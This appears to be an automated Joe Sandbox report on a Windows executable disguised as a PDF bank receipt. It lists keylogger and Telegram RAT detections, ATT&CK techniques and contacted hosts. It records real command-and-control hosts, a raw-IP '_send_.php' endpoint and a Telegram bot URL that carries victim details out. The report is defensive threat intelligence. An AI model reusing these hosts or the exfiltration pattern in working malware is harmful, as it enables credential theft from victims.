                  Source: Yara matchFile source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Process Injection                  		NTDS31
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync13
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  rDEKONT-1_15_2025__75kb__pdf.exe28%VirustotalBrowse
                  rDEKONT-1_15_2025__75kb__pdf.exe34%ReversingLabs
                  rDEKONT-1_15_2025__75kb__pdf.exe100%AviraHEUR/AGEN.1311126
                  rDEKONT-1_15_2025__75kb__pdf.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.96.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		193.122.6.168
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:414408%0D%0ADate%20and%20Time:%2015/01/2025%20/%2009:17:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20414408%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              http://checkip.dyndns.org/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003286000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icorDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botrDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.office.com/lBrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.orgrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:414408%0D%0ADate%20arDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://chrome.google.com/webstore?hl=enrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003255000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003246000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://varders.kozow.com:8081rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://aborters.duckdns.org:8081rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=enhrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003246000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://anotherarmy.dns.army:8081rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://checkip.dyndns.org/qrDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enlBrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003250000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003151000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.000000000310C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.orgrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.office.com/hrDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003277000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedrDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.00000000030E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          		api.telegram.orgUnited Kingdom
                                                                                          		62041TELEGRAMRUfalse
                                                                                          193.122.6.168
                                                                                          		checkip.dyndns.comUnited States
                                                                                          		31898ORACLE-BMC-31898USfalse
                                                                                          104.21.96.1
                                                                                          		reallyfreegeoip.orgUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1591553
                                                                                          Start date and time:2025-01-15 04:01:04 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 38s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:6
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.winEXE@3/1@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 205
                                                                                          • Number of non-executed functions: 87
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          22:01:55API Interceptor13697371x Sleep call for process: rDEKONT-1_15_2025__75kb__pdf.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                            QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    12.exeGet hashmaliciousUnknownBrowse
                                                                                                      12.exeGet hashmaliciousUnknownBrowse
                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              193.122.6.168mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              reallyfreegeoip.orgRFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.16.1
                                                                                                              ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.16.1
                                                                                                              tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              checkip.dyndns.comRFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              api.telegram.orghttps://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              12.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              ORACLE-BMC-31898USRFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 193.122.239.186
                                                                                                              50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              http://ubiquitous-twilight-c9292b.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                              • 129.213.176.209
                                                                                                              slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              TELEGRAMRUhttp://telenerh-ogjf.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.99
                                                                                                              http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.99
                                                                                                              https://ofmfy.icu/Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.99
                                                                                                              https://teiegtrm.cc/EN/Get hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.99
                                                                                                              https://teiegtrm.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.99
                                                                                                              https://teiegroj.cc/ZH/Get hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.99
                                                                                                              https://teiegroj.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.167.99
                                                                                                              https://teiegrvu.cc/VN/Get hashmaliciousTelegram PhisherBrowse
                                                                                                              • 149.154.170.96
                                                                                                              https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              CLOUDFLARENETUShttps://androiddatahost.com/sdsd3Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.80.92
                                                                                                              Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 188.114.96.3
                                                                                                              EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                                              • 104.17.25.14
                                                                                                              https://tvtsrilanka.com/Agrr/Get hashmaliciousUnknownBrowse
                                                                                                              • 104.18.11.207
                                                                                                              http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 172.66.0.235
                                                                                                              http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 172.66.0.235
                                                                                                              http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 172.66.0.235
                                                                                                              http://industrious-tomato-ngvkcs.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 104.17.24.14
